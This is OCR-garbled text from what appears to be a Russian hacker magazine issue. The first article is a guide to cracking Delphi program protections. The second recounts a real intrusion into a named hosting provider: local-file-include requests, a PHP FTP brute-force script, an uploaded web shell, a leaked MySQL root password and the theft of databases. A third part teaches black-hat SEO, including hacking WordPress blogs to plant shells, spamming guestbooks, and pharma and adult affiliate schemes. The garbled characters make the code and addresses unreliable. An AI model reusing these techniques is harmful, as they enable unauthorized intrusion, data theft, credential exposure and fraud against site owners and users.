на импортируемые функции, состоящей из множества команд ітр. 

Убедившись, что курсор стоит на функции ітр_йРогт5ЙТАррІіса1:іопй 

Сгеа1:еРогт$рргр1 75уз1:ет0ТМе1:аСІа55рѵ (что вовсе не факт, поскольку 
туту Ьіеѵѵ’а глюк, и, чтобы его обойти, приходится выбирать соседнюю 
функцию, а потом поднимать курсор руками), нажимаем <Р6> (РеЛ для 
поиска перекрестных ссылок и видим код типа приведенного ниже. 
Соответственно, <СМ-Р6> (ЫехРеЛ означаетпоискследующей ссылки 
на процедуру создания формы. Вот мы и будем жать <СМ-Р6>, пока не 
найдем все формы, какие только есть. 

ПОИСКУКАЗАТЕЛЯ НА СТРУКТУРУ ФОРМЫ В НІЕѴѴ'Е 

. 0040193А: 8В0БЕ01Е4100 шоѵ есх, [00411РЕ0] 

.00401940: 8В15РСЕ54000 шоѵ е<±х, [0040Е5ЕС] 

.00401946: Е8В9ВР0000 саіі @Еогш8@ 

ТАрр1ісаСіоп@Сгеа1:еРогт$ддгр175у8І:ет@ТМеЦа 

.0040194В: А134В65900 шоѵ еах,@Рогт8@ 

АррІісаДіоп ; ѵс160 



Разумеется, это работаеттолько с неупакованными программами, 
использующими статическую ли нковку, коих большинство. Если про- 
грамма упакована, то, прежде чем мы доберемся до таблицы импорта, 
ее предстоит распаковать, а если разработчикзадействовал динами- 
ческую компоновку, то один или несколько вызовов ітр_гаРогт50 

ТАррІісаІіоп(ЭСгеаІеРогт$рргр1 75у5ІетйТМе1;аСІа55рѵ останутся 
незамеченными (что плохо). В таких случаях выгоднее прибегнуть к 

отладчику, установив точку останова на ітр_йРогт5ЙТАрр[ісаІіопй 

Сгеа1;еРогт$рргр1 75уз1;етйТМе1:аСІа55рѵ, но об этом мы скажем позже, а 
пока разберемся с аргументами. 

Главным образом нас интересует аргумент, загружаемый в регистр ЕБХ и 
указывающий на структуру, по смещению 1 8Ь от начала которой располо- 
жен указатель на уже знакомую тебе вложенную структуру. 

Н ВОКРУГ ТОЧЕК ОСТАНОВА 

Самые сложные случаи взлома — это упакованные программы, загружаю- 
щие ѴСЬ-библ потеку на лету и не использующие никаких вразумительных 
имен в методах классов. Ломать такие защиты в дизассемблере — напрасно 
тратить время. Здесь лучше воспользоваться отладчиком, в роли которого 
может выступать не только тяжелая (БоШСЕ), но и легкая артиллерия в лице 
ОІАуОеЬЬидег. 

Загружаем программу в 0 Ну, в списке модулей (<АІ1-Е>) находим ѴСІ_хх.ЬрІ, 
давим на <Еп*ег> и, просматривая списокимпорта (<СМ-Ы>), находим 
желаемое имя. Давим <Р2> для установки программнойточки останова или 
<ЕпІег>, <5ЬіЛ-Р10>, Вгеакроіпр «Нагсіѵѵаге, оп ехесибоп» для установки 
аппаратной точки останова соответственно. Аппаратныеточки намного 
надежнее, но, увы, их всего четыре, а вот количество программныхточек 
останова ничем не ограничено. 

Остается только выбрать подходящие функции для бряканья. 

Краткий перечень наиболее важных из них (сточки зрения хакера) 
представлен ниже: 

гаТСоп*гоІ(сі6еіТехІ$ддгѵ ; ТСопІгоІ::6е*Техі(ѵоісІ) — аналог АРІ-функции 
ОеіѴѴіпсІоѵѵТехіА — считывает текст из элемента управления в буфер. 
гаМа5кгаТСи5ІотМа5кЕсііШ6еіТехІ$дягѵ — еще одна функция для 
чтения текста в буфер (применяется довольно редко, но все-таки 
применяется). 

гаСопІгоІ5гаТСопІгоіга5еіТехІ$ддгх175у5ІетгаАп5І5ігіпд — установка 
текста (то есть копированиетекста из буфера в элемент управления). 
га5у5Іетгагаі_5ігСтр$ддгѵ;5узІет::І_5ігСтр(ѵоіс1) — сравнениедвухтексто- 
вых строк (например, расчетного серийного номера с эталонным; очень 
важная хакерская функция). 

га5у5ІетШгаі_5ігСору$ддгѵ ; 5уз*ет::І_5ігСору(ѵоісі) — функция копирова- 
ния строк. 

га5у5иШ5га5ігТоІпІ$ддгх175у5Іет(аАп5ІБігіпд ; БузиШз-БігТоІпДБузІет:: 
АпзіБІгіпд) — функция преобразования текстовой строки в число (достаточ- 
но часто используется защитами). 

г ПРАЗДНИЧНОЕ ЗАКЛЮЧЕНИЕ 

Как видно, во взломе программ из Багдада ничего сложного нет, и они хака- 
ются со скоростью пробки, вылетающей из бутылки шампанского. 

Даже еще быстрее! Так что подарок к Новому году обеспечен ! т 
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В последнее время в Сети появилось огромное множество хостингов. Надо сказать, 
этому существенно способствует распространение реселлерских планов, которые есть 
практически везде: от зЬагеб-контор идо ѴТ)5/ѴРЗ-площадок. А действительно, почему 
бы не перепродавать чьи-то серверы? И ведь перепродают, гады! В свое время положи- 
тельно образом на этот вопрос ответила для себя добрая половина ру-хостеров, причем 
за бугром ситуация не сильно отличается. Вот только о качественном администрирова- 
нии своих производственных агрегатов задумываются очень редко (либо не задумыва- 
ются вообще). Особенно это касается криво написанных хост-панелей и еще более криво 
написанных серверов под зЬагеб-хостинг. Нам, хакерам, такое положение дел только на 
руку, ведь задача сильно упрощается, а результат превосходит все ожидания. 

В доказательство этого утверждения расскажу тебе о своей практике. Жертвой в этот 
раз, как ты уже догадался, стал респектабельный хостинг с солнечного континента :). 



Н С ЧЕГО НАЧИНАЮТСЯ ВЗЛОМЫ 

Расположившись прохладным осенним вечером дома на диване, я привыч- 
но всматривался в экран ноутбука, играя с очередным поломанным сер- 
вером :). Постепенно это занятие мне наскучило, и я уже начал мысленно 
собираться за пивом, как вдругокошко ІСО-клиента приветливо мигнуло, 
сигнализируя о новой полученной мессаге. Стучал один из моих старых 
знакомых, с которым мы нередко обмениваемся свежими багами. Вот и в 
этот раз он скинул мнелинкна какой-то бажный ресурс, коротко сообщив, 
что «игра стоит свеч». Задавать вопросы, зная товарища, я не стал, а просто 
скопировал ссылочку — ѵѵѵѵѵѵ.ЬагЬІБОп.согп.аи — в адресную строку своего 
браузера. Лениво надавив на <Еп1ег>, я увидел пагу из разряда боте зііез. 



Усмехнувшись я было подумал, что приятель хотел разыграть меня. Пред- 
чувствиеусилилось и после обнаружениятипичного локального инклуда: 

ЬДСр: / / У7Ѵ7Ѵ7 . ІіагЬізоп . сот . аи/ѵіеѵ7 . рЪр?раде— 

/ебс/раззжі 

«Ну на кой мне этот баг, да еще и на хом-паге?» — не переставал думать 
я. Однако подобные шутки не были присущи моему знакомому, а желание 
уточнить детали в асе быстро обломалось — хакер скрылся в оффлайне. В 
такой ситуации мне оставалосьтолько одно — разобраться во всем самому, 
тем более что любопытство уже владело мной :). 
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На этом месте был баг 



Первым делом я обнаружил конфиг Апача, который был заботливо разме- 
щен в стандартном каталоге: 

ІіДДр: / /ѵтѵ'тѵ? . Ь.агЬізоп . сот . аи/ѵіем . рЬ.р?раде— . 
/еДс/ЬДДрд/сопб/ЬДДрс!. сопб 

Особенно меня заинтересовало описание виртуальных хостов, имеющее 
следующий вид: 

Іпсіисіе /еДс/ІіДДрсі/сопТ/ѵІіозДз/зіДеІ 
Іпсіисіе /еДс/ЬДДрсі/соп:І:/ѵЬ.озі:з/зіі:е2 
Іпсіисіе /еДс/ІіДДрсі/сопТ/ѵІюзДз/зіДеЗ 
Іпсіисіе /еДс/ЪДДрсЗ/соп:Е/ѵ1іозДз/зіДе4 
Іпсіисіе /еДс/ІіДДрсі/сопТ/ѵіюзДз/зіДеЗ 
Іпсіисіе /еДс/ЬДДрсЗ/сопб/ѵІіозДз/зіДеб 
Іпсіисіе /еДс/ЪДДр<3/соп:І:/ѵ]іозДз/8ІДе7 
Іпсіисіе /еДс/ІіДДрсЗ/сопб/ѵІіозДз/зіДеЗ 
Іпсіисіе /еДс/ЬДДрсЗ/сопб/ѵІіозДз/зіДеЭ 

Таких записей в конфиге я обнаружил около пяти сотен! Смутные подоз- 
рения постепенно окутывали мое сознание. Ачто если админ ака гооі не- 
правильно выставил права на своем збагесі-хостинге? Ведь тогда я бы мог 
получить доступ на чтение к содержимому веб-каталогов всех ресурсов, 
располагающихся на сервере. Проверить возникшую идею не составило 
никаких проблем: 

ЬДДр: / /ммм . Ь.агЬізоп . сот . аи/ѵіем . рЬ.р?раде— . 
/еДс/ЬДДрсІ/сопТ/ѵІіозДз/зіДеІ 

Запрос успешно выполнился, и через две секунды яуже изучал полный 
путь до ѵѵеЬ-каталога первого ресурса (зііеі): 

<ѴігДиаІНозД 202 . б . 141 . 212> 

ЗегѵегЫаше меЫюзД-12 . асіаш. сот. аи 
ЗегѵегАсІтіп абшіп 

БоситепДКооД /Ьоте/ . зіДез/28/зіДе1/меЪ 

Домен привлек мое внимание сразу, поэтому я не поленился прогуляться 
по адресу бир:/Ал/еЬбозІ-12.асІагп.согп.аи . Как и ожидалось, сайт при- 
надлежал хостингу. Теперь я окончательно убедился в добрых намере- 
нияхзнакомого, скинувшего мне баг :]. Единственным смущавшим меня 
моментом был ѵѵѵѵѵѵ.сІогпаіпзсІЬ.пеі . который наотрез не хотел делиться 
даже ІР-адресом ломаемого мной сервера, не говоря уже о полном пе- 
речне доменов. В конце концов я списал это обстоятельство на глючность 
ООМАІЫЗОВ-сервиса :). 

Перебрав еще с десяток ресурсов, я пришел к выводу, что ничего полез- 
ного изтого, что есть, не извлечь. Трабла заключалась втом, что бажный 
скрипт ѵіеѵѵ.рбр именно инклудил файлы, а это само по себе обламывало 
возможность чтения чужого РНР-конфига. Идеальным вариантом был 
залив картинки/аватарки с содержащимся на борту РНР-кодом, но и 
здесь возникло несколько проблем. Во-первых, поиск полного пути для 



требуемого портала мог растянуться на часы (ѵбозіз содержал в себе 
около 500 записей), а во-вторых, обнаружить форум/чат/аплоадер на ка- 
ком-либо из хостящихся ресурсов оказалось совсем не просто. В итоге, 
промучившись час с лишним, я оставил эту затею. 

^ АЛЬТЕРНАТИВНЫЙ ПУТЬ 

Что ж, пора было приступать к обдумыванию альтернативных вариантов 
атаки, поскольку после первой, предварительной части работы на руках 
у меня был всего лишь криво настроенный збагесі-хостингс инклудом на 
одном из ресурсов. Сперва я решил пробежаться по сайту хостера ( бНр:// 
ѵѵеЬбозЫ 2.абат.сот.аи ). а заодно и оценить масштаб будущей наживы :). 
И тут мне случайно подвернулся рбріпЫЬ 

ЪЬДр: //меЫюзД-12 . адат. сот. аи/рЪріпбо .рЬр 

Он простодушно поделился со мной версией серверной оси: 

Ьіпих сіеѵ. Іезоіеіі . сот 2.4. 16С12_Ѵ #1 ТЪи Арг 4 22:06:23 
РЗТ 2002 І686 ипкпошт 

Ядрышко было явно несвежим, нотрогать его я пока не стал по причине 
появления новой задумки. Какты понимаешь, гулять по серваку с завя- 
занными глазами (да еще и с ограниченными правами) не очень приятно, 
поэтому в большинстве случаев я стараюсь читать лежащие в стандартных 
каталогах конфиги. Вспомнив о Иризегз, я, нетеряя времени, заглянул и в 
него. Располагался он, как и следовало ожидать, в/еІсДіризегз: 

# ассоипДз аге под аііомесі До ДДр іп 

Ып 

асЗт 

(іаетоп 

гооД 

пзссі 

таіі 

зЪиДсІоѵт 

ЬДДрсі 

патесі 

зупс 

пемз 

1р 

ЬаІД 

ииср 

поЬосіу 

рор 

розДдгез 

тузді 

зсзиісі 

рсар 

Увы, но гооТовый аккаунтбыл отключен, а вместе с ним еще десятка два 
акков. Тогда недолго думая я подредактировал свои изегіізі и раззіізі, 
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включив в каждых из них по несколько распространенных 
записей. Какты уже догадался, я собирался запустить РТР- 
брут. Воттолько заюзать на этот раз нужно было свой скрипт, 
который смог бы пробежаться по нужному мне диапазону ІР- 
адресов. Недолго думая, я взял в руки клаву и, вооружившись 
РНР, накодил требуемый брутер: 

<? 

ідпоге_изег_аЪогб (1); 
зеЦ_Ціше_1ішіЦ (0) ; 

$6сІ = бореп ( " . /6бр_изегз . бхб " , "г"); 

$61 = бореп ( " . /6бр_сІісб . бхб : " , "г"); 

$бг = бореп ( " . /ббр_1од . бхб " , "а"); 

$і=206 ; 

ѵйіііе ( $і<214) { 

$Ьозб = "202.6 .141. $і" ; 
ѵ/ЪіІе ( ! беоб ( $ бсЗ.) ) { 

$изег = бдебз ( $ бсЗ.) ; 
ѵ7Ііі1е ( !беоб($б1) ) { 

$разз = 6дебз($61); 

$соппесб = ббр_соппесб ( $1іозб ) ; 
іб ( I $соппесб) 

{ 

6рибз($6г, "ЕпаЫе соппесб бо $Ьозб\п") ; 
Ьгеак; 

} 

еізе { 

$аиб1і = ббр_1одіп ( $соппесб , 

$изег, $разз) ; 
іб ( ! $аибЬ) 

{ 

брибз ( $бг , 

" $1іозб : $изег : $разз — іпсоггесбЛп" ) ; 
66:р_диі6: ( $соппесб ) ; 

} 

е1зе{ 

брибз ( $бг , 

" $бюзб : $изег : $разз — СОЕКЕСТ\п" ) ; 
66:р_диі6: ($соппесб) ; 

} 

} 

} 



ІР’шников, в котором, собственно, и осуществляется перебор 
паролей/логинов. Забегая вперед, скажу, что я надеялся 
найти конкретного юзера — абтіп, так какего запись мне уже 
попадалась в одном из серверных конфигов. Однако после 
окончания брута я был ошарашен. 

Нет, админский акк остался цел, но вот одна из тестовых 
записей не была отключена! Таким образом, ко мне попал 
полноценный аккаунт вида: 

202 . б . 141 . 212 : ббр : ббр (логин — ббр, пароль 

- ббр) 

По опыту отмечу, что иногда админ после установки и настрой- 
ки РТР-сервера забывает отключить тестовую учетку, которая, 
как правило, содержит детский пароль. Так получилось и на 
этот раз :). 

Поначалу я считал, что дело сделано, но ситуация оказалось 
куда сложнее, чем я думал. Трабла состояла в невозмож- 
ности заливки своих файлов на РТР, то есть прав, по всей 
видимости, хватало, но сервер постоянно выплевывал 550-ю 
ошибку. Экспериментальным путем я таки нашел выход: 
один из НТМІ_-файлов в веб-дире был изменен на .рбр, 
после чего я слил его себе на винт и заменил содержимое 
РРІР-шеллом. В результате подобных манипуляций мне 
удалось залить веб-шелл. 

Ріо и на этом приключения не закончились. Теперь передо 
мной стояла задача поиска залитого ранее РНР-зЬеІіа. Если 
ты не въехал, коротко поясню: к РТР я коннектился на основ- 
ной ІР-адрес сервера — 202.6.141 .212, но по этому адресу 
моего скрипта не наблюдалось. Следовательно, обрученный 
мной РТР-аккбыл привязан к одному из 500 ресурсов. Ріо, 
как известно, кто ищет — тот найдет. И я нашел. Достаточно 
было стянуть с РТР'шника іпсіех-пагу и изучить ее содержимое 
— домен определился сам собой :). Получив заветный шелл, я 
испытал истинное наслаждение, но самое интересное ожида- 
ло меня впереди. 

г ОКОНЧАТЕЛЬНЫЙ РАСКЛАД 

Побродив по серверу, я обнаружил, что кроме старенького 
ядра там находился еще и бажный зепсітаіі :). Ріо все это было 
мелочью по сравнению с рутовым аккаунтом от всеми нами 
любимого мускула: 



} 

$і + + ; 

} 

бсіозе ( $61 ) ; 
бсіозе ( $бс1) ; 
брибз ($бг, "Бопе : \п" ) ; 
бсіозе ( $бг) ; 

?> 

Как видишь, все достаточно просто: ббр сі ісб.бхб — файл с 
паролями, Ир_и5ег5.М — юзернейм-файл, а ббріод .бхб — лог 
брутера. Далее идет цикл по заранее заданному диапазону 



Іосаіііозб : гооб :рар1ір8б34 

Пароль, кстати, я не сбрутил, а нашел в открытом виде в одном 
из конфигов (ну оченьтупой админ попался). В Му5СП_лежало 
около сотни баз, что не могло не радовать. Слив нажитое 
«честным путем» чужое добро, я удалился восвояси, пожелав 
администратору здоровья и удачной карьеры :). Практика 
слива «найденных» БД тебе уже должна быть хорошо знакома, 
поэтому повторяться не буду — разберешься сам. Я лишь, 
пользуясь случаем, поздравляютебя с Новым годом и желаю 
тебе сотен подобных хостингов с самыми большими и запоми- 
нающимися базами. Удачи :1. ~и~ 
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МІСГСО-ЗТАК ІГМТЕГСМАТЮМАІ- 



МІСГСО-ЗТАК ІМТЕКМАТЮМАЬ 



Квестна ноут 



Іппоѵаііоп шіІМ 5ІуІ(^: : 




т 






ПЕРВЫМ ДЕЛОМ НУЖНО СОБРАТЬ ВСЮ ИНФОРМАЦИЮ И ПРАВИЛЬНО ОТВЕТИТЬ 
НА 7 ВОПРОСОВ О НОУТБУКЕ. 



3 * Если максимально плотно 
заполнить невесомую коробку 
объемом 1 м3 ноутбуками 
6X600, сколько будет весить 
эта коробка? 



Думаю, когда ты прочитал про вопросы, то подумал что-то вроде «о, сейчас погуглю малость и вырублю себе ноут». 
Ну нет, приятель, не будь наивным. Пойми, просто так мы этот ноутбук никому не отдадим . 

Вопросы - это очень хорошо, только вот посерфить и найти ответы может каждый. А нам нужна уверенность, 
что будущий хозяин ноутбука его действительно заслуживает больше остальных. Поэтому переходим ко второй 
части конкурса. 

ЯНЯЯ нужно отправиться на сайт компании М5І (ѵѵѵѵѵѵ.тісгозіаг.ги) и начать методично просматривать все попадающиеся под руку страницы. 

Дело в том, что мы абсолютно хаотично раскидали по этому сайту 1 0 специальных кодов, которые могут привести тебя к призу. А могут и не привести: все 
зависит оттого, какты ими воспользуешься. Чтобы было проще, подскажу, что коды выглядят примерно воттак: А6Р, ЕЮ, 1 В4. 

Итого, какты соберешь все коды, тебе нужно расположить их в правильном порядке и расшифровать полученную строку. После расшифровки ты 
должен получить общеизвестное английское слово, которое есть в любом словаре. Это и будет подтверждением того, что ты нашел все коды, справил- 
ся с заданием и достоин крутого ноутбука М5І 6X600. 



1. На базе какого чипсета 



работает 6X600? 



2. Чем клавиатура 
этого ноута отличается 
от клавиатур других 
ноутбуков? 




4- Какую версию 
стандартная 802.1 1 
поддерживает 6X600? 



5 - На ноутбуке есть кноп- 
ка ТигЬо, при нажатии 
на которую произво- 
дительность ноутбука 
увеличивается на 20%. 
Что конкретно меняется, 
благодаря чему дости- 
гается рост производи- 
тельности? 



данные этот ноутбук 



и по какому интер- 
фейсу? 



6 . На какой макси- 



мальной скорости 
может передавать 



7 - Какая видеокар- 
та установлена на 
ноутбуке и в чем ее 
главная фишка? 




^выполнишь все задания, присылай свои результаты на т5І@геаІ. хакер. ги. 

Ответы поинимаются до 30 янваоя. 
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5Е0 

В КАРТИНКАХ 



ДЕЛАЕМ БАБКИ НА ПОИСКОВЫХ ЗАПРОСАХ 



Хей, гринго! Уже готовишься отмечать наступающий? Не торопись открывать шампан- 
ское, сначала внимательно изучи эту статью — я придумал, каким образом ты будешь 
наполнять свои ѴѴеЪМопеу-кошельки весь следующий год! Поехали :). 



г основы основ 

Ты, наверное, знаешь, что существуют сайты, на которых делают деньги 
наглые буржуи. Это магазины, торгующие порно (адалт), таблетками для им- 
потентов (фарма), рингтонами для телефонов импотентов :) и т.д. Но чтобы 
делать деньги на таких сайтах, нашим любимым буржуям нужны целевые 
посетители (или попросту траф). Причем они охотно платятза приходящий 
народ. Атеперь давай думать, кто же им этих самых посетителей поставля- 
ет? Ну конечноже поисковики! Тебе непонятно, каксвязаны поисковик, ма- 
газин и, собственно, твое неуемное желание заполучить много денег? А вот 
как: есть специальные сайты-партнерки, которые гонят твойтраф прямиком 
в нужный магазин по нужному запросу в поисковике. Чуешь? На таком 
поисковике ты как раз можешь зарегаться, а дальше нагонять целевых по- 



сетителей в магазины этой партнерской программы. Существуют партнерки 
с оплатой за клики (РРС — Рау РегСІіск], есть — с оплатой за покупки (РР5 
— Рау РегЭаІе), а есть — с оплатой за какие-либо совершаемые пользова- 
телем действия (переход на определенную страницу, заполнение формы]. 
Попозже мы подробнее остановимся на первом и втором типе. 

г ДОРВЕИ ДЛЯ САМЫХ МАЛЕНЬКИХ 

Итак, для реализации поставленной цели нам нужен свой дорвей (дор, 
боогѵѵау]. Что это такое? А это всего-навсего подложный сайт, ориентиро- 
ванный на какой-либо поисковый запрос (обычно Гугла, тзп и Яху), сделан- 
ный для того, чтобы подняться повыше в выдаче поисковика. Обычно весь 
дорвеингстроится следующим образом: 
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1) ищутся низкочастотные, низкоконкурентные запросы 
к поисковикам (далее НЧ), называемыетакже кеями или 
кейвордами; 

2) на основе этих НЧ генерируются НТМІ_-странички, связан- 
ные между собой в некое подобие сайта (чем больше кеев.тем 
больше страничек и тем лучше для нас); 

3) на главную страничку дорвея вставляется зашифрованный 
редирект (обычно Нтате, баѵа, АбАХ) на твой аккаунт в 5Е0- 
партнерке; 

4) послетого какдорвей будет полностью готов, его необхо- 
димо проспамитьс помощью специальныхутилитдля спама, 
которые оставят сообщения со ссылками на дор везде, где 
только можно (в форумах, гостевых и т.д.); 

5) затем сиди и жди в статистике твоей партнерки первый на- 
бежавший траф, переходы и покупки :]. И, конечно же, получай 
за это спонсорское бабло. 

Надеюсь, суть ты уяснил, но это лишьтеория. На практике все 
сложнее, и далеко не каждый успешно осядет в теме. Но обо 
всем по порядку... 

^ ДЕЛАЕМ ДОР 

Какже создать дор? Вручную? Малоэффективно. Значит, 
программно — доргеном. 

Есть доргены локальные (они создают дор на жестком диске, 
а заливать его на сервер придется ручками), а есть — сер- 
верные (и создают, и заливают одновременно). Конкретная 
программа нетакважна. Она, какни странно, почти ни на 
что не влияет. Здесь главное — выбрать подходящую те му и 
правильно проспамить ресурс. Но это не значит, что не стоит 
уделять внимание доргену и разбираться в его функциональ- 
ности. Из бесплатных доргенов я могутебе посоветовать 
Ооогѵѵау Раде ѴѴііагсІ, из платных одной из самых рульных 
является прога от І_е22ѵіе — геб.ВиІЧоп (стоит 100 ѵѵгш, 
купить ее можно на ШрУ/Іеггѵіе.ги/гЫ . Первая прога может 
потребовать для своей работы кейворды (поскольку сервис, 
из которого прога сама вытаскивает кеи, часто висит), а во 
второй уже встроен нормально работающий парсер кеев :). 
Поэтому немного расскажу тебе о том, какже добывать эти 
самые кейворды. 

Для поиска кейвордов существует множество специализи- 
рованных сервисов, мы же выберем один из них — ЬНр:// 
теааоѵегШге.сот/аеІкеѵѵѵогсІз . Заходим, вводим в окошко 
любой кейворд (например, из фармы всеми любимую виагру), 
капчу (для тех, кто в танке, — картинку с циферками и буков- 
ками для защиты отавтоматических запросов) и давим 6еД 
Сервис выдасттебе кучу НЧ, например: 



ѵіадга 

ѵіЪ . аД із ѵіадга 



Ьиу сЪеар ѵіадга 
огйег ѵіадга 
ѵіадга созД 
сіізсоипС ѵіадга 
депегіс ѵіадга 
ѵіадга заіез 
ѵіадга бог жшіеп 
ѵіадга ѵз 
изіпд ѵіадга 
деб ѵіадга 
ѵіадга асі 
ѵіадга изе 
ѵіадга асіз 
ѵіадга зех 

Вот это и естьте самые НЧ-кеи. Их можно смело юзать при 
генерации дорвея. Ах да, для нашего дорвея, конечно же, 
нужен аккаунт какой-либо партнерки :). Я могу посоветовать 
тебе Ьир://итах[оаіп.сот (РРС) и Ьир://гх-рагІпег5.ЬІ2 (про- 
дажи фармы). Для регистрации на ресурсах нужны инвайты, 
поспрашивай их у знакомых или на форуме сеошников 
— ЬирѴ/итахіогит.сот . 

Вернемся к нашему сгенеренномудору... Послеуспешного 
создания этот дор нужно куда-то залить. Конечно, можно 
залить его на бесплатные хостинги или сделать свой сайт на 
платном хостинге, но все это как-то не по-кулхацкерски :). 

Мы будем ломать пиаристые домены (РР — рейтингсайта по 
Гуглу), а еще лучше пиаристые блоги, которые этот самый Гугл 
просто обожает и индексирует моментально (так называемая 
«черная оптимизация»). В качестве примера возьмем всеми 
любимый ѴѴогсІРгезз. Чтобы не напрягаться со взломом, мо- 
жешь перерыть подшивку «Хакера» за этот год либо постучать 
ко мне в аську за паком сплоитов для этого движка. Заходим 
в Гугл, вводим в окне запроса что-то типа «зіІе:*.сот роѵѵегеб 
Ьу ѵѵогбргезБ». Конечно, можно искать нетолько в зоне .сот. 
Скажу по секрету: наибольший трасту Гугла вызываютзоны 
.еби, .доѵ, .тіі. Далее жамкаем «Поиск» :). Теперь необхо- 
димо определить РР найденных ссылок. Для этого идем на 
любимый мной сервис бНрУ/пОЬобу.сот/БсгірІз/абѵ/рг.рЬр и 
заливаем шеллы на наиболее пиаристые из них :). 

Далее нужно все это дело проспамить. Схема спама очень 
простая: берется гостевая книга (то есть любая страница в 
интернете с возможностью ее изменения) и в ней ставится 
ссылка на дор. Через энное количество времени Гугл находит 
эту ссылку, и по достижении определенного порога (количе- 
ства и качества ссылок) дор индексируется и появляется в 
выдаче. Расписывать тут, какспамить, я не буду :). Могулишь 
посоветовать для этого всем известный приватно-платный 
Хгитегс авторегой и обходом капчи. 




ЫірѴЛгепгу.огд.ги/ 
Ыод.рЬр — дорвеинг 
от А до Я. 

ЬНр://раІіЛети.сот 

— палютему :). 

Ыір://сЫпдІ 2 .огд 

— блог СЫпдіг’а. 

Ьіір^/доіискЬіг.согп 

— один из лучших 
5Е0-форумов. 

ЬирѴ/зео-ІіЬга гу. 
сот — блог«не- 
замутненного» 
оптимизатора. 

ЫЧрѴ/итахІюгипп. 
сот — форум 
итах’а. 

ѵѵѵѵѵѵ.агтабаЬоагб. 
сот — еще один 
форум по 5Е0. 

ЬирѴ/геапітаІог. 
Ыодзео.ги — 5Е0 
Тооіз. 

ЬирѴ/гаЬагоѵ- 

ах.ііѵеіоигпаі.сот 

— заметки дорвей- 
щика. 

ЬирѴ/абпе.іпію — за- 
метки о 5Е0. 

Ыір://кІікіогит.сот 

— и еще один 5Е0- 
форум. 
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Блин, я купил себе поесть, 
и денег больше не осталось. 




Петров, бедняга, работа 
админом делает тебя голо- 
дным? Ну на тебе немного 
кэша. А вообще, подтя- 
гивайся, будем вместе 
нагоднять траф с 
поисковиков . 



^ СДЕЛАЙ САМ! 

Атеперьмы вместе стобой сделаем свой первый дор. Для примера возьмем 
уже упоминавшуюся выше виагру и найденные для нее кеи. Далее идем в 
Ооогѵѵау Раде ѴѴігагсІ ЮРѴѴ), чтобы сгенеритьдор (руководств к программе 
в инете очень много, поэтому описывать работу проги я не стану). Тут ОРѴѴ 
за просит ссылку, по которой будет проходить редирект; ее ты сможешь взять в 
партнерке (обычно в разделе Ыпкз). После генерации дора заливаем получен- 
ное на взломанный пиаристый шелл и думаем, как спамить. Для этого ищем 
гостевые книги, форумы и любые скрипты в инете, где можно оставлять свои 
комментарии, для этого можно заюзать либо Адгезз Рагзег, либо парсер Гугла 
(например. ЬКр:/Ууоигдие5ксот.гиЛе5крІ"ір ). Мы возьмем для примера второй. 
Итак, вводим в верхнее поле диезіасісі и нажимаем «Искать», он выведет 
список гостевух. Причем, если РР гостевой книги меньше четырех, можешь 
не принимать такой сайт во внимание (при ручном спаме). Такие гесты 
нужны тем, кто спамиттысячи гестсразу. Вообще, спамить вручную, конечно 
же, неэффективно. Выше я тебе уже советовал Хрумер. Также ты можешь 




Ими и -ш и іи МЫ и 




поискать на 5Е0-форумах любой халявный автосабмиттер. Например, есть 
программа Віюпесііѵег МиШЗиЬтіКег ( ѵѵѵѵѵѵ.оиао.сот/тиШзиЬті^АезІіз . с 
прилагающимся мануалом по проге от одного из известнейшихсеошников 
— бгеепѴѴоосІ'а: Ьир://ЫоаагеепѵѵоосІ.сот/соттеп1:5/759 0 1 О С/ ). Ей 
тоже можно спамить, но прога оченьтормозная и глючная. Еще могу пореко- 
мендовать БтагіРозІег. Он платный, но ничто не мешаеттебе поискать кряк. 
Как видишь, в дорвеинге без приватного софта не обойтись. Надеюсь, что 
суть ты понял и купишь себе нужные проги (поверь, это того стоит :)). 

г ЗЛОКЛЮЧЕНИЕ 

Перечитай еще раз внимательно все, что я тут понаписал, и еще внима- 
тельнее — врезку с интервью и начинай действовать прямо сейчас. Ведь 
как Новый год встретишь, так его и проведешь :). Да, и я надеюсь, что тебе 
хватит вечнозеленых президентов, для того чтобы отблагодарить меня 
ящиком-другим пива сразу послезимнихпраздников. С Новым годом, 
новоиспеченный оптимизитор! ізс 



Обзор партнеров 
без которых 
не обойтись 

Партнерские программы РРС: 

\ѵ\ѵ\ѵ.итах1оеіп.сот — известнейшая РРС-партнерка, работающая с 
русскими веб-местерами. 75% от стоимости бида. 
кіікѵір.сот — РРС для буржуйского трафа, ежедневные выплаты. 
ѵ\длдѵ.СотрасГ5ЕО.сот — высокие биды, быстрые выплаты. 
реаксііск.сот — еще одна РРС, хорошие биды (99%) . 
тагкейпг.Зіп.пеГ — надежная РРС с еженедельными выплатами. 
л/ѵѵѵѵѵ.хтісазк.сот — партнерка от Маизег’а. Платят каждую неделю, 
минималка — $ 5 . 
сИск-сІіск.ги — русская РРС . 

сіісксазктопеѵ. сот — выкупают российский траф; выплаты раз в неде- 
лю в \/ѴеЬМопеу; минимальная сумма выплат — $15. 
\ѵ\ѵ\ѵ.5еагсМее(і.сот — здесь можно купить/ продать рекламу. Крупная 
буржуйская РРС-партнерка. 

Партнерские программы РР5 (Рау-Рег-5е11/5і$п) : 
абиКМепсШпбег. сот — $0,3 за регистрацию мужчины и $ 1,5 за 
регистрацию женщины плюс 50% от стоимости купленных ими услуг 
пожизненно. 



геп^осіагіп^.сот — реселлер АбикРгіепсІРіпсІег, $2 за любую 
регистрацию. 

згітиі-тесііа. сот — русская РР5 . 

ѵѵѵѵѵѵ.ѵісіеозсазк.сот — конвертация адалтного или мусорного трафа. 
ѵѵѵѵѵѵ.аскійсазк.гіі — конвертация адалтного трафа. 
ѵуѵѵѵу.іоеЬискз.сот — партнерка, торгующая «травяными» 
препаратами. 

гх- рагЕпегз.Ъіг — еще одна Іагтасу-партнерка (работающая с фарма- 
цевтикой) . До 50% комиссии. Еженедельные выплаты в ѴѴеЬМопеу, 
Рейіагсі, ХеГеІІег, РауРаІ, ѴѴіге Тгапзіег, ЗГошірау, МопеуЪоокегз, Е-СоЫ, 
Е-РаззроіТе. 

тѵѵѵ.гхрауоиЩ.сот — еще одна Іагтасу-партнерка. 
ѵѵѵѵѵѵ.аШІіаГеркагтасѵпеГѵѵогк.сот — партнерская программа по фар- 
мацевтике. Предоставляет для своих партнеров техническую помощь и 
на русском языке. 

^епЬискз.сот — партнерская программа по фармацевтике. 
\ѵтѵ.ркагтатес1іс5.сот — партнерская программа по фармацевтике. 
еѵарЬагтасѵ.Ьіг — партнерская программа по фармацевтике. Комисси- 
онные до 45%. 

